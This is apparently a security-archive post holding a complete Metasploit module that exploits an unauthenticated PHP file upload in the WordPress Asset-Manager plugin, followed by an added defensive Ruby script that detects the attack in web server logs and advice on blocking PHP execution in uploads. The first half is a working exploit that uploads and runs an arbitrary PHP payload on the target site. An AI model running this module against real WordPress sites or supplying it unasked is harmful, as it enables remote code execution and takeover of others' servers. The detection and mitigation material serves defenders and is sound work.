WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. It allows PHP file upload: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body; the plugin reads the upload from the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # The plugin echoes the stored file name on success; anything else is treated as failure
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Uploaded files land in the plugin's temp directory under wp-content/uploads
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
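From the defender's side, the module leaves a very recognisable trace in the web server log: an unauthenticated POST to the plugin's upload.php followed, from the same client, by a GET for a .php file under wp-content/uploads/assets/temp/. The Ruby script below is an added example (not part of the original post or of the Metasploit module) that parses Apache combined-format access-log lines and correlates those two requests per client IP. The log lines are constructed for the example and the IP addresses are documentation-range placeholders; the paths are the ones the module requests.

```ruby
require 'time'

# Constructed sample access-log lines in Apache "combined" format. The client
# addresses are documentation-range placeholders; the request paths are the
# two the module above issues (the plugin's upload.php and the temp directory).
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:20:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:20:05 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:20:06 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzrt.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.9 - - [31/Dec/2012:09:25:10 +0000] "GET /wordpress/wp-content/uploads/2012/12/photo.jpg HTTP/1.1" 200 8811 "-" "Mozilla/5.0"
  198.51.100.9 - - [31/Dec/2012:09:26:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/shell.php HTTP/1.1" 404 210 "-" "curl/7.26"
LOG

# Fields needed from a combined-format line: client IP, timestamp, method,
# path and status. Everything after the status is ignored.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

UPLOAD_ENDPOINT = %r{/wp-content/plugins/asset-manager/upload\.php\z}
TEMP_PHP        = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}i

# Returns a hash for one log line, or nil if the line does not parse.
def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  {
    ip:     m[:ip],
    time:   Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method],
    path:   m[:path].split('?', 2).first, # drop any query string before matching
    status: m[:status].to_i
  }
end

# Walks the log in order and correlates, per client IP, a POST to the plugin's
# upload.php with a later request for a .php file in the uploads temp directory.
# A successful (200) fetch of such a file within `window` seconds of the upload
# is the pattern the module above produces and is reported as :high.
def analyze(log_text, window: 60)
  findings = []
  last_upload = {} # ip => time of the most recent POST to upload.php
  log_text.each_line do |raw|
    e = parse_line(raw.strip)
    next unless e
    if e[:method] == 'POST' && e[:path] =~ UPLOAD_ENDPOINT
      last_upload[e[:ip]] = e[:time]
      findings << { ip: e[:ip], severity: :medium,
                    reason: 'POST to asset-manager upload.php (unauthenticated upload endpoint)' }
    elsif e[:path] =~ TEMP_PHP
      uploaded_at = last_upload[e[:ip]]
      if uploaded_at && (e[:time] - uploaded_at) <= window && e[:status] == 200
        findings << { ip: e[:ip], severity: :high,
                      reason: "PHP served from uploads temp dir shortly after upload: #{e[:path]}" }
      else
        # Any request for PHP under uploads/ is suspicious on its own, even a 404
        # (a probe for a previously dropped file).
        findings << { ip: e[:ip], severity: :low,
                      reason: "request for PHP in uploads temp dir (status #{e[:status]}): #{e[:path]}" }
      end
    end
  end
  findings
end

if __FILE__ == $0
  analyze(SAMPLE_LOG).each do |f|
    puts "#{f[:severity].to_s.upcase.ljust(6)} #{f[:ip]}  #{f[:reason]}"
  end
end
```

On the constructed sample this reports the first client at :high (upload followed one second later by a 200 on the dropped .php file) and the second client at :low (a 404 probe for a .php file in the temp directory with no preceding upload). The :high condition also tells you what to prevent: besides updating or removing the plugin, denying execution of .php under wp-content/uploads at the web server level means the upload may still succeed but the second request cannot run code, and the 200 on that GET never happens.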